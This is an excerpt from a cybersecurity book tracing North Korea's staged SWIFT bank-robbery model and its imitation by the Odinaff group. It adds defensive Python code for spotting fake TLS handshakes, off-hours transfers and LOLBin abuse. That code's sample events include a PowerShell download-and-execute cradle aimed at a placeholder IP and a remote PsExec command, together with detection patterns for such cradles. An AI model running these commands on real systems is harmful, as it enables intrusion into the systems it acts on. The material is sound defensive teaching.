In 2016, hackers associated with the North Korean government almost made off with $1 billion from Bangladesh Bank. Cyber criminals were paying attention. In this excerpt from cybersecurity expert Jon DiMaggio's upcoming book, the author runs down how North Korea established a model for targeting and robbing banks around the world, and what smaller-scale cyber actors have learned from them.
As long as banks have existed, people have been trying to rob them. But until recently, criminals had to physically enter the bank, usually masked and armed, and use the threat of violence to demand money. Today, that is no longer the case. Over the past 10 years, the world has seen many high-dollar bank compromises in which the robber never stepped foot on the premises.
Nation-state attackers are possibly the most dangerous and impactful threats that financial institutions face today. While nation-state attacks are rare, the monetary loss from a single attack is far greater than that from traditional cyberattacks. For these reasons, organizations need to handle and respond to them differently, as simply blocking or mitigating the initial threat will not stop this type of attacker.
Computing technology and the internet have made banks more secure than ever. Unfortunately, they have also provided criminals with new opportunities for theft. Banks today risk losing more money from a single criminal operation than ever before. A brick-and-mortar robbery is limited to the funds on hand at the branch. Online banking lets a financial institution grant customers access to funds far beyond those available at one physical location. While this lets banks serve their customers better, it also means an online attacker who obtains the right access can move vast sums of money.
The Rise of Nation-State Cyber Attacks
Typical cybercriminals often don't have the means, or the time, required to execute attacks against financial institutions. Nation-state attackers, by contrast, pose a significant threat to financial institutions because they have the resources and technological fluency to defeat robust cyber defenses. And remember, a government will have different motivations than a criminal.
Here's something you may not have realized: financial gain isn't always the objective of these nation-state attacks. Prior to 2013, nation-state attacks against banks primarily caused denials of service. The governments that executed these operations, primarily Iran and North Korea, did so to make a statement, retaliate, or weaken the economy of the nation in which the bank operates. In 2013, after years of denial-of-service (DoS) attacks, nations began financial theft operations: sanctions against the attacking country inhibit its economy and motivate poorer nations to steal to fill the gap.
While it is now common to read about nation-state cyberattacks resulting in substantial economic losses, these attacks are still a relatively new threat. Understanding the evolution of these attacks helps explain how these nation-states become the financial attackers that they are today. Below, we will discuss attacks against the financial industry and attackers’ motivations and methodologies.
The North Korea Financial Theft Model
On June 8, 2018, the U.S. Department of Justice issued a criminal complaint against a North Korean citizen named Park Jin Hyok. (Editor’s note: the information and quoted material presented below, when not otherwise specified, derives from the DOJ complaint linked above.) The complaint documented several computer-related crimes, including hacking, that Park conducted along with unnamed individuals.
The complaint provides an inside look at the hacking operations of North Korea, one of the most notorious nation-state attackers to date. It also offers extremely useful details for a defensive perspective. This section draws on this information. The staged attack model listed here originates from details within Department of Justice’s criminal complaint, in conjunction with research and publicly available analyses from security vendors.
It involves the following phases: reconnaissance, initial compromise, observation and learning, enumeration and privilege escalation, preparation of the staged environment (account and resource creation), execution of fraudulent transactions, and deletion of evidence. While some of the malware and tactic details varied from one attack to another, North Korea continued to use the same phased approach described here. It's fair to conclude that North Korea will use the same approach for as long as it succeeds.
Reconnaissance
The attackers spent considerable time performing reconnaissance. For example, Park began conducting online reconnaissance a year before an attack on Bangladesh Bank. During this stage, the attackers would gather information about the bank’s public-facing infrastructure, as well as associated email addresses.
Park researched the target bank’s website and employees, including their social media accounts. In some instances, the attackers used services that specialized in “locating email accounts associated with specific domains and companies.”
Attackers collected email addresses to create target lists for use in the next phase of the attack. In some instances, the attackers created spoofed accounts that mimicked someone known to the target. In others, the attacker created email addresses to register social media accounts. Attackers leveraged these social media accounts in later stages of the attack. Furthermore, attackers also mapped out the target’s public infrastructure, likely in an attempt to identify any vulnerabilities that they could exploit to gain access to the victim’s environment in later stages as well.
Park also researched specific vulnerabilities to identify how to exploit them. Presumably, these were vulnerabilities he identified when conducting reconnaissance into the Bangladesh Bank’s infrastructure. In addition to these factors, attackers created and staged accounts and online personas during the reconnaissance phase of the attack. They created email accounts from free, publicly available webmail platforms such as Gmail. Later in the process of the attack, these accounts interacted with bank employees and sent spear-phishing emails.
Initial Compromise
Multiple North Korean financial theft campaigns used social engineering in the form of spear-phishing emails to compromise and gain access to the target’s environment. Attackers tailored these spear-phishing emails to target the individuals and accounts that they had identified during reconnaissance.
According to U.S. federal investigators, North Korean hackers crafted emails in several high-profile bank attacks that were “highly targeted, (and) reflect the known affiliations or interests of the intended victims and are crafted—with the use of appropriate formatting, imagery and nomenclature—to mimic legitimate emails that the recipient might expect to receive.”
In other words, the attackers spent time and resources to make the email specific, relevant and appear legitimate to the targets. Once compromised, attackers used the email accounts to send spear-phishing emails to other bank officials from legitimate accounts. This aspect of familiarity adds legitimacy to the email. The attackers often were not interested in compromising additional recipients; however, they included them, so the actual target saw familiar email addresses in the “To” or “CC” line of the email.
This tactic demonstrates the level of detail and planning the attackers put into their spear-phishing emails. Companies often use public-facing email addresses that are not attached to a specific individual. Instead, a group or an administrator at the organization monitors these public-facing email addresses. A typical example of this is when companies use a single email address to receive résumés and other types of correspondence.
At Bangladesh Bank, the attackers recognized such an email address as an opportunity to submit a résumé weaponized with malware. Examples within the criminal complaint included links in the body of the email requesting that targets click to view a résumé. When the targets clicked the link, malware compromised their systems, providing attackers with access to both the system and the environment.
Other North Korean compromise attempts included the use of emails mimicking alerts or notifications from social media and service providers such as Google and Facebook. For example, attackers utilized standard emails alerting users when someone accessed their account from a new location. The fraudulent emails mirrored legitimate ones by including the same text and images.
The primary difference between the two was the sender address—which attackers also often spoofed—and the URLs within the email. Attackers made sure to obfuscate the links in order to appear legitimate, but these links took the victims to attacker-controlled infrastructure to infect them with malware. Financial institutions suffered from attacks other than spear-phishing campaigns, however.
In 2016 and 2017, legitimate financial-themed websites that other banking companies and individuals often visited succumbed to infection. These websites then infected site visitors with custom malware. For example, attackers compromised the website of the Polish Financial Supervision Authority, and the website later infected financial organizations in Poland. The attackers knew that many other banks in this region would often visit the website. Similar attacks occurred around the same time, affecting the site of a Mexican financial regulator and a bank in South America. Each attack compromised systems and resulted in the website serving malware to website visitors. Later, analysis of the malware distributed by the compromised sites showed an overlap in code only previously seen in North Korean malware.
Observation and Learning
In all of the North Korean–attributed financial attacks, the attackers spent time learning the local environment. Based on the behaviors seen across multiple intrusions, North Korea is a patient attacker that spends considerable amounts of time within the targets’ environment before executing the financial theft phase of the attack.
In some cases, the attackers spent several months observing and learning the systems and how they connect and interact with other banking resources. For example, a unique attribute of these attacks is the amount of time the North Korean attackers spent learning the banks’ policies and procedures. Here, the objective for the attackers was to better understand how employees handle and conduct financial transactions.
This is notable because, except for nation-state espionage campaigns that were not a major concern to financial institutions at the time, it was generally unheard of for an attacker to spend time learning the targets' employee policies and procedures. Doing so is another example of the planning and patience the attackers put into these operations. It also illustrates the difference between a typical financial attacker and a nation-state attacker.
North Korea's diligence in learning the banks' noncyber policies paid off. Two of the targeted banks, Tien Phong Bank (Vietnam) and Bangladesh Bank, archived SWIFT transactions differently than most financial institutions. Bangladesh Bank printed paper copies of SWIFT messages. Hard copies of the transactions provided a physical record archived at the bank. Tien Phong Bank, however, stored electronic PDF versions of the messages on a third-party server. It used Foxit Reader, an application for managing digital documents such as PDFs, to convert SWIFT message details into PDF records.
The attackers identified this process and developed malware that would infect the bank’s systems when bank employees attempted to access the PDF software by replacing that application with a weaponized version of the software. If the attackers had tried to implement this at Bangladesh Bank, it would not have worked. This is because the bank used printed copies to archive transaction messages. Alternatively, at the Vietnamese bank, if the attackers had attempted to print hard copies instead of saving the messages as PDFs, it would likely draw attention to their activities. Taking the time to learn each bank’s unique business processes allowed the attackers to identify creative ways to further infect and quietly execute fraudulent transactions. More importantly, the attackers used the information to blend in with legitimate bank activity.
Enumeration and Privilege Escalation
The attackers also used various hack tools (often publicly available) to enumerate the victims’ environments. The goal of enumeration was to identify “computers the bank used to send and receive messages via the SWIFT communication system.” As part of their security practices, the targeted institutions implemented a “segregation of duties” policy within their environments. This is a practice that prevents any one person from having complete access to critical business systems and functions within the environment. Unfortunately, this did not prevent the attackers from gaining the necessary access to attempt fraudulent financial transactions. It did, however, increase the difficulty of the attack.
The attackers needed access to multiple protected accounts to get into various systems and segregated networks before infiltrating the accounts and systems associated with SWIFT transactions. Many of these administrative accounts fell into attackers’ control via using credential-collecting hack tools, such as keyloggers, or through spearphishing emails sent from legitimate internal bank accounts.
One such keylogger present in the Bangladesh Bank heist hid within the C:\Windows\Web\Wallpaper\Windows\ directory on a compromised host, which suggests the malware may have been delivered through an attachment mimicking desktop wallpaper.
Preparing the Stage
To continue operations and stage the target environment, the attackers needed to maintain an undetected presence. The malware’s communication traffic could have caught the attention of defenders as it actively communicated with both internal victim infrastructure and adversary command-and-control servers. In an effort to hide their activity, attackers used what has been described as a “custom binary protocol designed to look like TLS traffic” to encrypt the malware’s communications.
TLS, short for Transport Layer Security, is the protocol that encrypts network traffic so that it does not cross the wire as clear text. The attackers did not use real TLS. Instead, their malware prepended a fake TLS record header to its own traffic. In the first version, the fake handshake carried a hard-coded array in place of the cipher suite and random fields, so that a casual look at the packet showed what appeared to be a TLS handshake while the payload was encrypted with the attackers' own scheme. A second version kept the fake header but filled the cipher suite field with random values instead of a fixed array, defeating signatures written against the first version.
These headers were prepended to the command-and-control traffic generated by the malware. In real TLS, a cipher suite names the algorithms used for key exchange, authentication, encryption, and integrity, and banks rely on these suites every day to secure traffic between communicating hosts; here the field was only decoration. The attackers built this custom protocol into a custom-developed backdoor known as Nestegg. Without the key and an understanding of the custom protocol, nobody could decrypt traffic originating from the infected system, and a passive observer had little reason to look twice at it.
Since the communication traffic appeared similar to legitimate TLS traffic, the attackers were able to communicate with command-and-control infrastructure covertly. The attackers added another level of complexity by having the Nestegg backdoor run in memory on the victim system.
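The defensive counterpart to the fake-TLS trick is to check whether a record that claims to be a TLS handshake actually parses as one. The following is an added example, not code from the book or from any vendor's analysis of Nestegg: it builds a constructed ClientHello for comparison, then runs a set of structural checks over a record (does the length field match the payload, is the client random genuinely random, are the offered cipher suites registered values, are they duplicated). A hard-coded array standing in for the random and cipher suite fields, as the page describes for the first Nestegg variant, fails several of these checks at once. The allow-list of cipher suites and the sample byte strings are constructed for the example.

```python
import struct

# Subset of IANA-registered cipher suites a real client would offer (constructed allow-list for the example).
KNOWN_SUITES = {
    0x002F, 0x0035, 0x009C, 0x009D,          # TLS_RSA_WITH_AES_*
    0xC02B, 0xC02C, 0xC02F, 0xC030,          # ECDHE AES-GCM
    0xC013, 0xC014, 0x1301, 0x1302, 0x1303,  # ECDHE AES-CBC, TLS 1.3
}
RECORD_VERSIONS = {0x0301, 0x0302, 0x0303}


def build_client_hello(suites, client_random=bytes(range(32))):
    """Assemble a minimal TLS 1.2 ClientHello record (no extensions) for the constructed samples."""
    cs = b"".join(struct.pack("!H", s) for s in suites)
    body = (struct.pack("!H", 0x0303) + client_random + b"\x00"          # version, random, empty session id
            + struct.pack("!H", len(cs)) + cs + b"\x01\x00")            # cipher suites, null compression
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body              # HandshakeType client_hello(1)
    return b"\x16" + struct.pack("!HH", 0x0301, len(handshake)) + handshake  # ContentType handshake(22)


def check_client_hello(record: bytes):
    """Return the reasons a record does not look like a genuine ClientHello (empty list = looks genuine)."""
    findings = []
    if len(record) < 5:
        return ["record shorter than a TLS record header"]
    ctype, version, rlen = struct.unpack("!BHH", record[:5])
    body = record[5:]
    if ctype != 0x16:
        findings.append(f"content type {ctype:#x} is not handshake(22)")
    if version not in RECORD_VERSIONS:
        findings.append(f"record version {version:#06x} is not a TLS version")
    if rlen != len(body):
        findings.append(f"record length field {rlen} disagrees with payload length {len(body)}")
    if len(body) < 4 + 2 + 32 + 1 + 2:
        findings.append("payload too short to hold a ClientHello")
        return findings
    htype, hlen = body[0], int.from_bytes(body[1:4], "big")
    if htype != 0x01:
        findings.append(f"handshake type {htype:#x} is not client_hello(1)")
    if hlen != len(body) - 4:
        findings.append(f"handshake length field {hlen} disagrees with payload length {len(body) - 4}")
    client_random = body[6:38]
    if len(set(client_random)) < 8:
        findings.append("client random is low-entropy (hard-coded array rather than 32 random bytes)")
    p = 38
    sid_len = body[p]
    p += 1 + sid_len
    if p + 2 > len(body):
        findings.append("session id runs past end of record")
        return findings
    cs_len = struct.unpack("!H", body[p:p + 2])[0]
    p += 2
    if cs_len == 0 or cs_len % 2:
        findings.append(f"cipher suite list length {cs_len} is zero or odd")
    if p + cs_len > len(body):
        findings.append("cipher suite list runs past end of record")
        cs_len = len(body) - p
    suites = [struct.unpack("!H", body[p + i:p + i + 2])[0] for i in range(0, cs_len - cs_len % 2, 2)]
    if suites and not any(s in KNOWN_SUITES for s in suites):
        findings.append("no registered cipher suite offered")
    if len(set(suites)) != len(suites):
        findings.append("cipher suite list contains duplicates")
    return findings


# Constructed samples: a plausible ClientHello, a "fake TLS" record whose random and cipher suite fields
# are a hard-coded array, and a copy of the fake whose length field lies about the payload.
LEGIT = build_client_hello([0xC02F, 0xC030, 0x1301, 0x1302])
FAKE = build_client_hello([0xEEEE, 0xEEEE, 0xEEEE], client_random=b"\x41" * 32)
TRUNCATED = FAKE[:3] + struct.pack("!H", len(FAKE) + 20) + FAKE[5:]

if __name__ == "__main__":
    for name, rec in (("legit", LEGIT), ("fake", FAKE), ("truncated", TRUNCATED)):
        print(name, check_client_hello(rec) or "looks like a real ClientHello")
```

These checks are heuristics for a sensor or a packet-capture triage script, not a replacement for full TLS parsing; the second Nestegg variant, which randomised the cipher suite bytes, would still trip the unregistered-suite and length checks but not the low-entropy one, which is why a detection should never rest on a single field.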
We call malicious code that runs exclusively in memory on the victim's system fileless malware. The benefit of this design is that the malware can go undetected, since it is never written to, or present on, a physical drive; it executes and runs commands directly in memory, while most security products watch files as they are written to the protected system's disk. The drawback of fileless malware is its lack of persistence: because nothing is written to disk, it is lost when the infected system reboots. Nestegg addressed this shortcoming by monitoring the victim system for shutdown and reboot events. When it detected either, the malware wrote a copy of itself to the hard drive so that it could be relaunched once the operating system came back up. After rebooting and reinstalling, the malware deleted the on-disk copy and once again existed only in memory.
Nestegg had various other notable functions, such as “acting as a proxy to send commands to other infected systems, and accept commands to upload and download files, list, delete files, start, and terminate processes.” These capabilities allowed the attackers to stage, prepare, and further compromise the banks’ systems and networks. Specifically, the attackers placed malware on various systems involved with processing the banks’ financial transactions.
Execution of Fraudulent Transactions
Up to this point, the attackers had gained access, observed bank systems, applications, processes, and staged malware throughout the bank’s network. Using the malware and information gained, the attackers were able to acquire various types of administrative accounts.
Typically, no single entity would (or should) have complete access to the systems and components used to conduct a bank’s financial transactions. However, these attackers used vast resources generally not available to typical criminals to obtain all the credentials necessary to authorize financial transactions. Next, the attackers used the accounts to log into the SWIFT Alliance application, a message interface application, to conduct financial transactions.
The SWIFT systems are usually separate from other bank networks, and network segregation, enforced with routers and firewalls, protects the systems. In the Bangladesh Bank heist, however, the bank’s infrastructure did not meet the security standards that should have been in place. In a report titled “North Korean Cyber Capabilities,” the U.S. Congressional Research Service noted the following: Bangladesh’s network may have been particularly vulnerable, as it reportedly lacked a firewall to protect against outside intrusion. Of note, in some of the North Korean financial attacks, the attackers obtained access to legitimate accounts, while in others, they created new ones. This included the operator accounts necessary to access the local SWIFT Alliance application.
The Alliance application "is a customer-managed gateway to the SWIFT network that transmits and receives messages" from one bank to another to create and confirm financial transactions. At an institution with proper security controls in place, the creation of new operator accounts should have stood out as an uncommon event.
In addition, the attackers made unsuccessful login attempts against the Alliance application before they got in. Unfortunately, neither the creation of the operator accounts nor the failed login attempts alerted anyone, and the attackers gained complete access to the bank's local SWIFT systems. As previously mentioned, the attackers likely selected banks in countries or regions they believed to have weaker or less developed technology security standards.
Between using printed physical copies of SWIFT transactions and not securing SWIFT systems, it is fair to say Bangladesh Bank was an easier target than many other financial institutions. At this point, the attackers began to execute financial transactions. The transactions appeared legitimate, given that an account with valid access to the SWIFT system created and authorized them. From an outside perspective, as other banks involved in the transaction would view it, these were legitimate transactions made with the proper authorization and access.
Before 2013, this type of attack had either not taken place or not been publicly acknowledged, so there was no reason to doubt the legitimacy of the transactions. In February 2016, the attacker-created SWIFT operator accounts attempted at least 35 transactions. In total, North Korea tried to steal nearly 1 billion dollars from the Bangladesh Bank.
Timing the Transaction Attempts
According to a 2019 public report that SWIFT published, the attackers documented the time of the fraudulent transfers at the Bangladesh Bank. A pattern appeared: the transactions primarily occurred after working hours, between 11 p.m. and midnight in the local time. The report also documented the time of the attackers' financial transactions at other banks believed to have been targeted by the same North Korean attackers. Almost every attack occurred between 9 p.m. and 4 a.m. local time, when the banks were closed.
The second pattern present in several of the bank attacks deals with the dates of the attacks. In several incidents, the attackers attempted fraudulent transactions on holidays, when banks were closed. By conducting the transactions later in the evening to early morning and on holidays when bank employees are less likely to be present, the attackers had an increased chance of success.
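Both timing patterns are cheap to detect once a bank treats its own payment-operator activity as telemetry. The following is an added example, not from the book or from SWIFT's report: it runs a small rule set over a constructed transfer log, flagging transfers outside business hours, on closed weekdays or listed holidays, and bursts of transfers by one operator inside a short window (the page describes 35 attempts in one night). The business hours, the Friday/Saturday weekend (Bangladesh's official weekend) and the holiday list are assumptions for the example, and the log lines are constructed rather than taken from any real incident.

```python
from dataclasses import dataclass
from datetime import date, datetime, time, timedelta

# Assumed local policy for the example: open 09:00-17:00, closed Friday and Saturday (the weekend in
# Bangladesh), and closed on the listed holidays (constructed list; 21 February is a real national holiday).
BUSINESS_START, BUSINESS_END = time(9, 0), time(17, 0)
CLOSED_WEEKDAYS = {4, 5}                # Monday=0 ... Friday=4, Saturday=5
HOLIDAYS = {date(2016, 2, 21)}


@dataclass(frozen=True)
class Transfer:
    ts: datetime
    operator: str
    amount: float
    beneficiary: str


def parse_line(line: str) -> Transfer:
    """Parse one constructed log line: '<local timestamp>|<operator>|<amount>|<beneficiary>'."""
    ts, operator, amount, beneficiary = line.split("|", 3)
    return Transfer(datetime.fromisoformat(ts), operator, float(amount), beneficiary)


def flag_transfers(lines, burst_window=timedelta(hours=1), burst_count=5):
    """Return [(transfer, [reasons])] for every transfer that breaks the expected timing pattern."""
    transfers = sorted((parse_line(line) for line in lines), key=lambda t: t.ts)
    flagged = []
    for i, t in enumerate(transfers):
        reasons = []
        if t.ts.date() in HOLIDAYS:
            reasons.append("holiday")
        if t.ts.weekday() in CLOSED_WEEKDAYS:
            reasons.append("closed weekday")
        if not BUSINESS_START <= t.ts.time() < BUSINESS_END:
            reasons.append("outside business hours")
        # Burst rule: this operator's transfers in the window ending at t (list is sorted, so look back only).
        recent = [u for u in transfers[:i + 1] if u.operator == t.operator and t.ts - u.ts <= burst_window]
        if len(recent) >= burst_count:
            reasons.append(f"{len(recent)} transfers by {t.operator} within {burst_window}")
        if reasons:
            flagged.append((t, reasons))
    return flagged


# Constructed sample log (not real Bangladesh Bank data): one daytime transfer, a late-night burst by a single
# operator that spills past midnight into a closed day, and one transfer on a holiday.
SAMPLE_LOG = [
    "2016-02-04 11:15:00|OPR01|250000|SUPPLIER LTD",
    "2016-02-04 23:36:00|OPR07|20000000|BENEFICIARY A",
    "2016-02-04 23:41:00|OPR07|30000000|BENEFICIARY B",
    "2016-02-04 23:47:00|OPR07|25000000|BENEFICIARY C",
    "2016-02-04 23:52:00|OPR07|6000000|BENEFICIARY D",
    "2016-02-04 23:58:00|OPR07|20000000|BENEFICIARY E",
    "2016-02-05 00:05:00|OPR07|81000000|BENEFICIARY F",
    "2016-02-21 10:00:00|OPR03|120000|SUPPLIER LTD",
]

if __name__ == "__main__":
    for t, reasons in flag_transfers(SAMPLE_LOG):
        print(t.ts, t.operator, f"{t.amount:,.0f}", "->", "; ".join(reasons))
```

The rules are deliberately simple; the point is that the alert must be raised and read by someone who is actually on duty, which is exactly the condition the attackers chose their timing to avoid. An off-hours rule that pages nobody until Monday is the same as no rule.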
Deleting Evidence and Covering Tracks
Methods and procedures varied for handling records associated with SWIFT transactions at targeted banks. From an attacker perspective, if a bank employee or the bank’s systems identified the transactions, this could give away their operation. To address this, the attackers designed features in their malware to delete files and other evidence left during the compromise. For example, a forensic investigation of compromised bank systems identified signs that the attackers had attempted to remove entries from system logs.
Another common tactic seen across all the financial attacks was to delete malware from the infected systems once it had completed its given task. Specifically, multiple North Korean malware variants such as Contopee, Nestegg, and SierraCharlie included a “secure delete function.” However, the way the malware achieved this differed from one variant to another. Additionally, while not always successful, the attackers attempted to remove evidence of login attempts to the SWIFT Alliance application and its associated database(s).
It is highly likely the attacker behind the SWIFT Banking attacks is the adversary behind the 2014 Sony Pictures Entertainment attacks. Components in the malware, such as the secure delete function and the custom cipher protocol, may have been initially designed for the Sony attack and then modified or updated for use in the bank attacks between 2015 and 2018.
Bangladesh Bank Response
The Federal Reserve Bank of New York received the attacker-generated transaction requests. These transactions processed money transfers to accounts in the Philippines and Sri Lanka. Fortunately for the Bangladesh Bank, the total amount of the funds stolen was far less than the 1 billion dollars that attackers had requested.
Ironically, these attackers, who spent a year carefully planning every detail of the heist, made a mistake in the most critical phase of their attack: they misspelled the name of a destination bank in one of the transaction requests. The attackers spelled "NGO, Shalika Foundation" as NGO Shalika "Fandation." This simple spelling error was enough for one of the banks routing the money to catch the activity. When the routing bank identified the misspelling, it contacted Bangladesh Bank, which immediately terminated the transaction.
The North Korean attackers would have stolen almost a billion dollars, but according to media reports, the Federal Reserve had also contacted Bangladesh Bank because of the unusually large number of transfer requests and the funds going to private organizations, such as the NGO. The bank stopped the pending transactions. In total, the banks managed to retain between $850 million and $870 million by stopping these transfers before they reached attacker-controlled accounts. Still, the attackers made away with approximately $101 million from Bangladesh Bank.
Odinaff: How Cybercriminals Learn from Nation-States
Few cybercriminals are capable of the persistence, patience, and planning used in the engagements covered so far. Unfortunately, there are always exceptions.
The North Korean SWIFT attacks made global headlines in 2016, garnering the attention of an organized cybercrime group named Odinaff. That year, security researchers revealed what they had discovered regarding the tactics, techniques and procedures used in the SWIFT attacks to compromise the banks. This information has helped better defend against these incidents. But it also provided criminal attackers with a roadmap for future bank compromises.
Believed to originate from Eastern Europe, Odinaff successfully exploited banks with its own malware. It relied on tactics first seen in North Korean attacks, and current intelligence suggests that the group successfully stole millions of dollars from financial institutions.
As an initial attempt to gain access to the banks' systems, the attackers injected malware into a popular remote administration tool called Ammyy Admin. They hoped bank administrators would download it, effectively infecting themselves. To do this, the attackers compromised the legitimate Ammyy Admin website, an attack that may sound elaborate, but in fact criminals have frequently compromised the same site to distribute commodity malware.
NOTE The website used to host Ammyy Admin has been known to distribute remote access trojans, exploit kits, and ransomware. Due to this risk, you should not visit the hosting website or download this tool.
While the trojanized Ammyy Admin might have functioned as an effective infection vector, the attackers likely realized it gave them no control over who downloaded the application. This risked infecting many unintended victims and exposed them to unwanted public attention. Probably for this reason, the attackers switched to spearphishing emails, which allowed them to choose their targets.
Odinaff's spearphishing emails were nowhere near as sophisticated as North Korea's. Although targeted, the phishing campaign used a generic email template directing recipients to click a URL in the body of the email. The URL downloaded the malicious payload, but the download did not infect victims by itself. It was a password-protected compressed file, and the target had to open it with a password included in the email text.
If victims followed the attackers' instructions, the archive would decompress and present the target with a Microsoft Office document. When victims opened the document, it prompted them to enable macros. If the target did not enable macros, the infection failed. Only if victims followed all of these steps did the first-stage malware, known as Trojan.Odinaff, compromise the system, providing the attackers with initial access to the victims' environment. That the attack required so many active steps on the part of the victims shows how fragile it was; if the targets had become suspicious of the emails, or of the unusual requirements for opening the attachment, the attack would have failed.
It may seem hard to fathom that anyone would fall for such a scheme. Yet it happened more than once, in attacks across several banks.
The Odinaff malware provided basic backdoor functionality: it issued shell commands and downloaded and executed additional malware. It used a mutex with a name hard-coded into the binary. A mutex is a named operating-system synchronization object; malware commonly creates one with a fixed name so that a second copy can tell the first is already running.
In this case, the identifier revealed whether a system was already infected. If it was, the malware halted execution. This prevented multiple infections on the same host, which would have tied up additional resources and potentially drawn unwanted attention. The malware also used a hard-coded proxy to connect to command-and-control servers, making it harder for defenders to spot the outgoing traffic.
Once in the victim's environment, the attackers would review the infected hosts and identify systems of interest. They then used Odinaff's malware to download the stage-two malware, known as Backdoor.Batle, onto the subset of high-value systems. (Researchers coined the name Backdoor.Batle after a string they found in the malware code containing the term "BATLE_SOURCE.")
The Batle malware ran malicious payloads in memory on the victims' systems, and it created a reverse shell, launched from a batch file, between it and the attackers' infrastructure. The Batle malware was built on common penetration-testing software, the red-team tools Metasploit and Cobalt Strike. The Metasploit framework identifies vulnerabilities and executes exploitation code against them. Cobalt Strike interoperates with Metasploit and provides post-exploitation and attack-management capabilities.
Penetration testers commonly use both for legitimate security assessments. Unfortunately, cyberattackers also use these tools to find and exploit weaknesses in victims' environments.
Odinaff's attack shared another tactic with those of nation-states: the use of tools already present in the victim's environment. By driving legitimate administrative tools and Microsoft Windows operating system binaries that are already on the system, the attacker gets the capability of malware without dropping any. This tactic, known as Living off the Land Binaries (LOLBins), lets attackers hide their activity behind legitimate system binaries that security tools often whitelist.
When a binary is whitelisted, tools such as antivirus and endpoint detection software will not treat the file as malicious. Whitelisting prevents security tools from removing or quarantining legitimate operating system resources whose loss would affect system functionality. Knowing this, attackers use those resources for their own purposes and avoid detection. The Odinaff attackers used Windows administration software such as PsExec, Netscan and PowerShell. When the attackers needed a capability the victims' environment did not already provide, they relied on publicly available hacktools instead of custom ones.
A growing trend in cyberattacks, this strategy makes discovery and attribution more difficult. For example, both criminal and nation-state attackers have used the hacking tool Mimikatz against banks, because it is freely available, effective, a favorite of legitimate red teams and impossible to attribute.
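Because LOLBin abuse uses binaries that no file signature will ever flag, detection has to come from how the binary was invoked. The following is an added example, not code from the book or from any vendor's Odinaff analysis: it runs a handful of process-creation rules over constructed Sysmon-style events, covering the tools the page names (PsExec on both the source and the target host, Netscan, and PowerShell with hidden-window and encoded-command flags) and decodes an -EncodedCommand argument, which is base64 of UTF-16LE, so the analyst sees the real command. The host names, users, addresses and command lines are constructed for the example and do not describe any real system.

```python
import base64
import re


def _encode_ps(cmd: str) -> str:
    """PowerShell's -EncodedCommand expects base64 over UTF-16LE (used here only to build the sample)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed process-creation events in the shape of a Sysmon Event ID 1 / EDR record (not real telemetry).
EVENTS = [
    {"host": "WS-017", "user": "bank\\jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"host": "SRV-SWIFT-01", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe", "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"host": "WS-017", "user": "bank\\svc_backup", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\psexec.exe", "cmdline": r"psexec.exe \\SRV-SWIFT-01 -s -d cmd.exe /c whoami"},
    {"host": "WS-017", "user": "bank\\svc_backup", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Tools\netscan.exe", "cmdline": "netscan.exe /range:10.10.5.1-10.10.5.254"},
    {"host": "WS-022", "user": "bank\\admin2", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
    {"host": "WS-022", "user": "NT AUTHORITY\\SYSTEM", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

RE_ENC = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
RE_HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-nop\b|-noprofile\b", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression",
                             re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind a PowerShell -EncodedCommand argument, or None if there is none."""
    m = RE_ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_lolbins(events):
    """Return [(event, [reasons])] for events that look like living-off-the-land abuse."""
    hits = []
    for ev in events:
        image = ev["image"].lower()
        cmd = ev["cmdline"]
        reasons = []
        if image.endswith("psexesvc.exe"):
            reasons.append("PsExec service binary started (remote execution target)")
        if image.endswith("psexec.exe") and re.search(r"\\\\\S+", cmd):
            reasons.append("PsExec launched against a remote host (lateral movement source)")
        if image.endswith("netscan.exe"):
            reasons.append("network scanner run interactively")
        if image.endswith("powershell.exe"):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                reasons.append(f"encoded command decodes to: {decoded}")
            if RE_HIDDEN.search(cmd):
                reasons.append("hidden window / no-profile flags")
            if DOWNLOAD_CRADLE.search(decoded or cmd):
                reasons.append("download cradle in command")
        if reasons:
            hits.append((ev, reasons))
    return hits


if __name__ == "__main__":
    for ev, reasons in hunt_lolbins(EVENTS):
        print(ev["host"], ev["image"].rsplit("\\", 1)[-1], "->", " | ".join(reasons))
```

The PSEXESVC rule is the one worth keeping even in a noisy environment: the service binary only ever appears on the host being driven remotely, so a hit on a SWIFT-connected server is a lateral-movement indicator regardless of who ran the client.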
Using Batle, the attackers learned everything they could about the victims’ environment. They spent time monitoring banks’ activities and exploring the systems and infrastructure. Specifically, the Batle malware included the ability to capture keystrokes and images of users’ screens in five- to thirty-second intervals. It then saved the output to a disk, where attackers could retrieve and study the captures. This allowed criminal attackers to learn the banks’ processes and technical procedures for the execution of financial transactions.
Another capability of the Batle malware—again, modeled after the nation-states’—was a module that allowed attackers to wipe the victim’s disk drive. Despite its inclusion, attackers did not use this capability. The Odinaff attackers also manipulated the SWIFT messaging system using tactics almost identical to the nation-states’.
The malware looked for any strings in the SWIFT messages that included specific details, such as dates and international bank account numbers. When the date and account number in a SWIFT message matched the details associated with a fraudulent transaction, the malware suppressed the message, preventing the bank from discovering the activity or at least delaying it until the funds were already gone.
